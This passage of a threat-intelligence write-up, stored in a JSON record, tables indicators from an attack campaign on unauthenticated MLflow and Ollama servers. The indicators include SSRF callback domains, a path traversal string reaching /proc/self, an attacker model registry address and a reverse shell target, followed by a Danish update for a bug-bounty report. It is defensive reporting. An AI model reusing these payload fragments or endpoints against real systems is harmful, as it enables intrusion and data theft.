|\n|-----|-------------|----------|\n| CVE-2023-1177 | MLflow SSRF via model registry source URL | oast.me, oast.fun, oast.live, dnsg.cc in model source URLs |\n| CVE-2023-42364 | MLflow path traversal in artifact URLs | ../../../../../../../../../../../ and /proc/self in model sources |\n| N/A | Ollama unauthenticated model injection from arbitrary registry | leak_model_0-5 from 205.237.106.117:8443/attacker/ |\n| N/A | Unauthenticated Streamlit/MLflow exposure | 6+ servers with zero auth on both Streamlit and MLflow |\n\n## Model source categories across all servers\n\n| Category | Example | Indicator |\n|----------|---------|-----------|\n| Legitimate ML models | breeders_5_heads_model, gc_loss_model, TAH_LOSS_MODEL | s3://flow-bucket paths |\n| SSRF payloads | ml-cbYCAjKm, ml-qZeqKYkU | dnsg.cc, oast.live URLs |\n| Path traversal | q94722, r17131, 38994GE3E2sFHE0z7ekpEplvWwo | /proc/1, /../ paths |\n| ProtectAI scans | protectai-* UUIDs | Automatic CVE scanner |\n| Malicious Ollama models | leak_model_0-5 | 205.237.106.117:8443/attacker/ |\n| Reverse shell SSRF | poc_1966 | 1.2.3.4:4444 |\n\n## Opdatering til Huntr Submission\n\nKampagnen er st\u00f8rre end oprindeligt rapporteret:\n- 6+ kompromitterede servere (ikke kun 2)\n- Aktiv path traversal exploitation (CVE-2023-42364)\n- 6 nye dnsg.cc hashes\n- Reverse shell target 1.2.3.4:4444\n- Databricks filesystem access (dbfs:/)\n", "creation_timestamp": "2026-05-18T18:18:06.000000Z"}]}